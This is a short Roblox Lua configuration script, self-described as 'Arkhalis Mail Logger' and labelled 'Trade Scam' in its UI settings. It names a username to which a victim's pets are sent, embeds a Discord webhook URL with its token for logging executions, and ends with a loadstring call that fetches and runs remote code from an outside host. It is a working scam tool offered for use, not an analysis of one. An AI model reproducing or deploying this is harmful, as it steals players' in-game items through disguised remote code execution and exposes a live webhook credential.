--[[ Arkhalis Mail Logger ]]--

--[[ Main Config ]]--
_G.Username = "VixoOnTop" --// Username To Send Pets To
_G.GiftMessage = "COEMS" --// Message For The Gift To Say

--[[ Webhook Config ]]--
_G.Webhook = "https://discord.com/api/webhooks/1101922162543181905/eyPwoLKkM4MpanJQDRt3FqqzNS_oFtM60Z-An80i13MjajqlJU8n8lSGxHgG1qJV7L_J" --// Discord Webhook For Executions

--[[ UI Config ]]--
_G.ScriptName = "Trade Scam" --// Script Name On The UI
_G.Tip1 = "thanks" --// Gives You Tips On The UI
_G.Tip2 = "thnaks" --// Gives You Tips On The UI
_G.Tip3 = "thanks" --// Gives You Tips On The UI
_G.Tip4 = "thnaks" --// Gives You Tips On The UI
_G.Tip5 = "thnaks" --// Gives You Tips On The UI
--[[ Script ]]--

loadstring(game:HttpGet("https://arkhalislua.github.io/Lua/Arkhalis.lua"))()
